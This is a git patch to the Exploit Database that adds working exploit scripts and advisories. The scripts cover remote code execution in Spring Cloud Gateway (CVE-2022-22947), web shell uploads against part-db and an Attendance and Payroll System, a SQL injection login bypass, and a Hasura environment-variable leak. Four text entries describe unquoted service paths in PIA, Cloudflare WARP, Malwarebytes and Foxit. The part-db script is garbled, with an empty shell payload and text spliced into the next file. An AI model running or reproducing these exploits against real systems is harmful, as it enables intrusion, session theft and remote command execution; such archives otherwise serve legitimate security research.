From e8863e001fe16daedd63cacc45b56edce2e82d1b Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 8 Mar 2022 05:01:37 +0000 Subject: [PATCH] DB: 2022-03-08 9 changes to exploits/shellcodes Private Internet Access 3.3 - 'pia-service' Unquoted Service Path Cloudflare WARP 1.4 - Unquoted Service Path Malwarebytes 4.5 - Unquoted Service Path Foxit PDF Reader 11.0 - Unquoted Service Path Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE) part-db 0.5.11 - Remote Code Execution (RCE) Attendance and Payroll System v1.0 - Remote Code Execution (RCE) Attendance and Payroll System v1.0 - SQLi Authentication Bypass Hasura GraphQL 2.2.0 - Information Disclosure --- exploits/java/webapps/50799.py | 87 +++++++++++++++++++++++++ exploits/multiple/webapps/50803.py | 47 ++++++++++++++ exploits/php/webapps/50800.sh | 21 ++++++ exploits/php/webapps/50801.py | 101 +++++++++++++++++++++++++++++ exploits/php/webapps/50802.py | 45 +++++++++++++ exploits/windows/local/50804.txt | 36 ++++++++++ exploits/windows/local/50805.txt | 25 +++++++ exploits/windows/local/50806.txt | 28 ++++++++ exploits/windows/local/50807.txt | 26 ++++++++ files_exploits.csv | 9 +++ 10 files changed, 425 insertions(+) create mode 100755 exploits/java/webapps/50799.py create mode 100755 exploits/multiple/webapps/50803.py create mode 100755 exploits/php/webapps/50800.sh create mode 100755 exploits/php/webapps/50801.py create mode 100755 exploits/php/webapps/50802.py create mode 100644 exploits/windows/local/50804.txt create mode 100644 exploits/windows/local/50805.txt create mode 100644 exploits/windows/local/50806.txt create mode 100644 exploits/windows/local/50807.txt diff --git a/exploits/java/webapps/50799.py b/exploits/java/webapps/50799.py new file mode 100755 index 000000000..08b62ee26 --- /dev/null +++ b/exploits/java/webapps/50799.py @@ -0,0 +1,87 @@ +# Exploit Title: Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE) +# Google Dork: N/A +# Date: 03/03/2022 +# Exploit Author: Carlos E. Vieira +# Vendor Homepage: https://spring.io/ +# Software Link: https://spring.io/projects/spring-cloud-gateway +# Version: This vulnerability affect Spring Cloud Gateway < 3.0.7 & < 3.1.1 +# Tested on: 3.1.0 +# CVE : CVE-2022-22947 + +import random +import string +import requests +import json +import sys +import urllib.parse +import base64 + +headers = { "Content-Type": "application/json" , 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','Accept' : '*/*'} +proxies = { + 'http': 'http://172.29.32.1:8081', + 'https': 'http://172.29.32.1:8081', +} +id = ''.join(random.choice(string.ascii_lowercase) for i in range(8)) + +def exploit(url, command): + + payload = { "id": id, "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\u0022"+command+"\u0022).getInputStream()))}"}}],"uri": "http://example.com"} + + commandb64 =base64.b64encode(command.encode('utf-8')).decode('utf-8') + + rbase = requests.post(url + '/actuator/gateway/routes/'+id, headers=headers, data=json.dumps(payload), proxies=proxies, verify=False) + if(rbase.status_code == 201): + print("[+] Stage deployed to /actuator/gateway/routes/"+id) + print("[+] Executing command...") + r = requests.post(url + '/actuator/gateway/refresh', headers=headers, proxies=proxies, verify=False) + if(r.status_code == 200): + print("[+] getting result...") + r = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False) + if(r.status_code == 200): + get_response = r.json() + clean(url, id) + return get_response['filters'][0].split("'")[1] + else: + print("[-] Error: Invalid response") + clean(url, id) + exit(1) + else: + clean(url, id) + print("[-] Error executing command") + + +def clean(url, id): + remove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False) + if(remove.status_code == 200): + print("[+] Stage removed!") + else: + print("[-] Error: Fail to remove stage") + +def banner(): + print(""" + ################################################### + # # + # Exploit for CVE-2022-22947 # + # - Carlos Vieira (Crowsec) # + # # + # Usage: # + # python3 exploit.py # + # # + # Example: # + # python3 exploit.py http://localhost:8080 'id' # + # # + ################################################### + """) + +def main(): + banner() + if len(sys.argv) != 3: + print("[-] Error: Invalid arguments") + print("[-] Usage: python3 exploit.py ") + exit(1) + else: + url = sys.argv[1] + command = sys.argv[2] + print(exploit(url, command)) +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/50803.py b/exploits/multiple/webapps/50803.py new file mode 100755 index 000000000..8cee83383 --- /dev/null +++ b/exploits/multiple/webapps/50803.py @@ -0,0 +1,47 @@ +# Exploit Title: Hasura GraphQL 2.2.0 - Information Disclosure +# Software: Hasura GraphQL Community +# Software Link: https://github.com/hasura/graphql-engine +# Version: 2.2.0 +# Exploit Author: Dolev Farhi +# Date: 5/05/2022 +# Tested on: Ubuntu + +import requests + +SERVER_ADDR = 'x.x.x.x' + +url = 'http://{}/v1/metadata'.format(SERVER_ADDR) + +print('Hasura GraphQL Community 2.2.0 - Arbitrary Root Environment Variables Read') + +while True: + env_var = input('Type environment variable key to leak.\n> ') + if not env_var: + continue + + payload = { + "type": "bulk", + "source": "", + "args": [ + { + "type": "add_remote_schema", + "args": { + "name": "ttt", + "definition": { + "timeout_seconds": 60, + "forward_client_headers": False, + "headers": [], + "url_from_env": env_var + }, + "comment": "" + } + } + ], + "resource_version": 2 +} + r = requests.post(url, json=payload) + try: + print(r.json()['error'].split('not a valid URI:')[1]) + except IndexError: + print('Could not parse out VAR, dumping error as is') + print(r.json().get('error', 'N/A')) \ No newline at end of file diff --git a/exploits/php/webapps/50800.sh b/exploits/php/webapps/50800.sh new file mode 100755 index 000000000..0a3a9858e --- /dev/null +++ b/exploits/php/webapps/50800.sh @@ -0,0 +1,21 @@ +# Exploit Title: part-db 0.5.11 - Remote Code Execution (RCE) +# Google Dork: NA +# Date: 03/04/2022 +# Exploit Author: Sunny Mehra @DSKMehra +# Vendor Homepage: https://github.com/part-db/part-db +# Software Link: https://github.com/part-db/part-db +# Version: [ 0.5.11.] +# Tested on: [KALI OS] +# CVE : CVE-2022-0848 +# +--------------- + +#!/bin/bash +host=127.0.0.1/Part-DB-0.5.10 #WEBHOST +#Usage: Change host +#Command: bash exploit.sh +#EXPLOIT BY @DSKMehra +echo "">POC.phtml #PHP Shell Code +result=`curl -i -s -X POST -F "logo_file=@POC.phtml" "http://$host/show_part_label.php" | grep -o -P '(?<=value="data/media/labels/).*(?=" > > Attendance and Payroll System v1.0') + print(' >> Unauthenticated Remote Code Execution') + print(' >> By pr0z\n') + + def info(self, message): + print(f"[{self.white}*{self.end}] {message}") + + def warning(self, message): + print(f"[{self.yellow}!{self.end}] {message}") + + def error(self, message): + print(f"[{self.red}x{self.end}] {message}") + + def success(self, message): + print(f"[{self.green}✓{self.end}] {self.bold}{message}{self.end}") + + +upload_path = '/apsystem/admin/employee_edit_photo.php' +shell_path = '/apsystem/images/shell.php' +#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} + +shell_data = "" + +multipart_form_data = { + 'id': 1, + 'upload': (''), +} + +files = {'photo': ('shell.php', shell_data)} + +output = Interface() +output.header() + +# Check for arguments +if len(sys.argv) < 2 or '-h' in sys.argv: + output.info("Usage: python3 rce.py http://127.0.0.1") + sys.exit() + +# Upload the shell +target = sys.argv[1] +output.info(f"Uploading the web shell to {target}") +r = requests.post(target + upload_path, files=files, data=multipart_form_data, verify=False) + +# Validating shell has been uploaded +output.info(f"Validating the shell has been uploaded to {target}") +r = requests.get(target + shell_path, verify=False) +try: + r = requests.get(target + shell_path) + if r.status_code == 200: + output.success('Successfully connected to web shell\n') + else: + raise Exception +except ConnectionError: + output.error('We were unable to establish a connection') + sys.exit() +except: + output.error('Something unexpected happened') + sys.exit() + +# Remote code execution +while True: + try: + cmd = input("\033[91mRCE\033[0m > ") + if cmd == 'exit': + raise KeyboardInterrupt + r = requests.get(target + shell_path + "?cmd=" + cmd, verify=False) + if r.status_code == 200: + print(r.text) + else: + raise Exception + except KeyboardInterrupt: + sys.exit() + except ConnectionError: + output.error('We lost our connection to the web shell') + sys.exit() + except: + output.error('Something unexpected happened') + sys.exit() \ No newline at end of file diff --git a/exploits/php/webapps/50802.py b/exploits/php/webapps/50802.py new file mode 100755 index 000000000..891cd6f25 --- /dev/null +++ b/exploits/php/webapps/50802.py @@ -0,0 +1,45 @@ +# Exploit Title: Attendance and Payroll System v1.0 - SQLi Authentication Bypass +# Date: 04/03/2022 +# Exploit Author: pr0z +# Vendor Homepage: https://www.sourcecodester.com +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/apsystem.zip +# Version: v1.0 +# Tested on: Linux, MySQL, Apache + +import requests +import sys +from requests.exceptions import ConnectionError + + +print('\n >> Attendance and Payroll System v1.0') +print(' >> Authentication Bypass through SQL injection') +print(' >> By pr0z\n') + +login_path = '/apsystem/admin/login.php' +index_path = '/apsystem/admin/index.php' + +payload = "username=nobodyhavethisusername' UNION SELECT 1 as id, 'myuser' as username, '$2y$10$UNm8zqwv6d07rp3zr6iGD.GXNqo/P4qB7fUZB79M3vmpQ6SidGi.G' as password ,'zzz' as firstname,'zzz' as lastname,'zzz.php' as photo, '2018-04-30' as created_on -- &password=test&login=" +headers = {'Content-Type': 'application/x-www-form-urlencoded'} +#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} + + +# Check for arguments +if len(sys.argv) < 2 or '-h' in sys.argv: + print("[!] Usage: python3 apsystem_sqli.py http://127.0.0.1") + sys.exit() + +# Bypass Authentication +target = sys.argv[1] +print("[+] Extracting Administrator cookie using SQLi ...") +sess = requests.Session() +try: + sess.get(target + index_path,headers=headers, verify=False) + sess.post(target + login_path, data=payload, headers=headers,verify=False) +except ConnectionError: + print('[-] We were unable to establish a connection') + sys.exit() + +cookie_val = sess.cookies.get_dict().get("PHPSESSID") + +print("[+] Use the following cookie:\n") +print(f"PHPSESSID: {cookie_val}") \ No newline at end of file diff --git a/exploits/windows/local/50804.txt b/exploits/windows/local/50804.txt new file mode 100644 index 000000000..a0b414036 --- /dev/null +++ b/exploits/windows/local/50804.txt @@ -0,0 +1,36 @@ +# Exploit Title: Private Internet Access 3.3 - 'pia-service' Unquoted Service Path +# Date: 04/03/2022 +# Exploit Author: Saud Alenazi +# Vendor Homepage: https://www.privateinternetaccess.com +# Software Link: https://www.privateinternetaccess.com/download +# Version: 3.3.0.100 +# Tested: Windows 10 x64 +# Contact: https://twitter.com/dmaral3noz + +# Step to discover Unquoted Service Path: + +C:\Users\saudh>wmic service where 'name like "%PrivateInternetAccessService%"' get name, displayname, pathname, startmode, startname + +DisplayName Name PathName StartMode StartName +Private Internet Access Service PrivateInternetAccessService "C:\Program Files\Private Internet Access\pia-service.exe" Auto LocalSystem + +# Service info: + +C:\Users\saudh>sc qc PrivateInternetAccessService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: PrivateInternetAccessService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : "C:\Program Files\Private Internet Access\pia-service.exe" + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Private Internet Access Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + + +#Exploit: + +A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. \ No newline at end of file diff --git a/exploits/windows/local/50805.txt b/exploits/windows/local/50805.txt new file mode 100644 index 000000000..f270daa1b --- /dev/null +++ b/exploits/windows/local/50805.txt @@ -0,0 +1,25 @@ +# Exploit Title: Cloudflare WARP 1.4 - Unquoted Service Path +# Date: 05/03/2022 +# Exploit Author: Hejap Zairy +# Vendor Homepage: https://www.cloudflare.com/ +# Software Link: https://developers.cloudflare.com/warp-client/get-started/windows/ +# Version: 1.4.107 +# Tested: Windows 10 Pro x64 es + +C:\Users\Hejap>sc qc CloudflareWARP +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: CloudflareWARP + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Cloudflare\Cloudflare WARP\\warp-svc.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Cloudflare WARP + DEPENDENCIES : wlansvc + SERVICE_START_NAME : LocalSystem + +#Exploit: + +A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. \ No newline at end of file diff --git a/exploits/windows/local/50806.txt b/exploits/windows/local/50806.txt new file mode 100644 index 000000000..472ffc4e8 --- /dev/null +++ b/exploits/windows/local/50806.txt @@ -0,0 +1,28 @@ +# Exploit Title: Malwarebytes 4.5 - Unquoted Service Path +# Date: 05/03/2022 +# Exploit Author: Hejap Zairy +# Vendor Homepage: https://www.malwarebytes.com/ +# Software Link: https://www.malwarebytes.com/mwb-download/ +# Version: 4.5.0 +# Tested: Windows 10 Pro x64 es + +C:\Users\Hejap>sc qc MBAMService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: MBAMService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Malwarebytes Service + DEPENDENCIES : RPCSS + : WINMGMT + SERVICE_START_NAME : LocalSystem + + + +#Exploit: + +A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. \ No newline at end of file diff --git a/exploits/windows/local/50807.txt b/exploits/windows/local/50807.txt new file mode 100644 index 000000000..823c9b918 --- /dev/null +++ b/exploits/windows/local/50807.txt @@ -0,0 +1,26 @@ +# Exploit Title: Foxit PDF Reader 11.0 - Unquoted Service Path +# Date: 05/03/2022 +# Exploit Author: Hejap Zairy +# Vendor Homepage: https://www.foxit.com/pdf-reader/ +# Software Link: https://www.foxit.com/downloads/#Foxit-Reader/ +# Version: 11.0.1.49938 +# Tested: Windows 10 Pro x64 es + +C:\Users\Hejap>sc qc FoxitReaderUpdateService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: FoxitReaderUpdateService + TYPE : 110 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Foxit PDF Reader Update Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + + +#Exploit: + +A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 8dfd726eb..beccbf3d5 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11457,6 +11457,10 @@ id,file,description,date,author,type,platform,port 50789,exploits/windows/local/50789.py,"Cobian Reflector 0.9.93 RC1 - 'Password' Denial of Service (PoC)",1970-01-01,"Luis Martínez",local,windows, 50790,exploits/windows/local/50790.py,"Cobian Backup 11 Gravity 11.2.0.582 - 'Password' Denial of Service (PoC)",1970-01-01,"Luis Martínez",local,windows, 50791,exploits/windows/local/50791.txt,"Cobian Backup Gravity 11.2.0.582 - 'CobianBackup11' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows, +50804,exploits/windows/local/50804.txt,"Private Internet Access 3.3 - 'pia-service' Unquoted Service Path",1970-01-01,"Saud Alenazi",local,windows, +50805,exploits/windows/local/50805.txt,"Cloudflare WARP 1.4 - Unquoted Service Path",1970-01-01,"Hejap Zairy Al-Sharif",local,windows, +50806,exploits/windows/local/50806.txt,"Malwarebytes 4.5 - Unquoted Service Path",1970-01-01,"Hejap Zairy Al-Sharif",local,windows, +50807,exploits/windows/local/50807.txt,"Foxit PDF Reader 11.0 - Unquoted Service Path",1970-01-01,"Hejap Zairy Al-Sharif",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 @@ -44868,3 +44872,8 @@ id,file,description,date,author,type,platform,port 50794,exploits/php/webapps/50794.py,"Xerte 3.10.3 - Directory Traversal (Authenticated)",1970-01-01,"Rik Lutz",webapps,php, 50795,exploits/php/webapps/50795.py,"Xerte 3.9 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Rik Lutz",webapps,php, 50797,exploits/multiple/webapps/50797.txt,"Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)",1970-01-01,"Momen Eldawakhly",webapps,multiple, +50799,exploits/java/webapps/50799.py,"Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE)",1970-01-01,"Carlos E. Vieira",webapps,java, +50800,exploits/php/webapps/50800.sh,"part-db 0.5.11 - Remote Code Execution (RCE)",1970-01-01,"Chetanya Sharma",webapps,php, +50801,exploits/php/webapps/50801.py,"Attendance and Payroll System v1.0 - Remote Code Execution (RCE)",1970-01-01,pr0z,webapps,php, +50802,exploits/php/webapps/50802.py,"Attendance and Payroll System v1.0 - SQLi Authentication Bypass",1970-01-01,pr0z,webapps,php, +50803,exploits/multiple/webapps/50803.py,"Hasura GraphQL 2.2.0 - Information Disclosure",1970-01-01,"Dolev Farhi",webapps,multiple,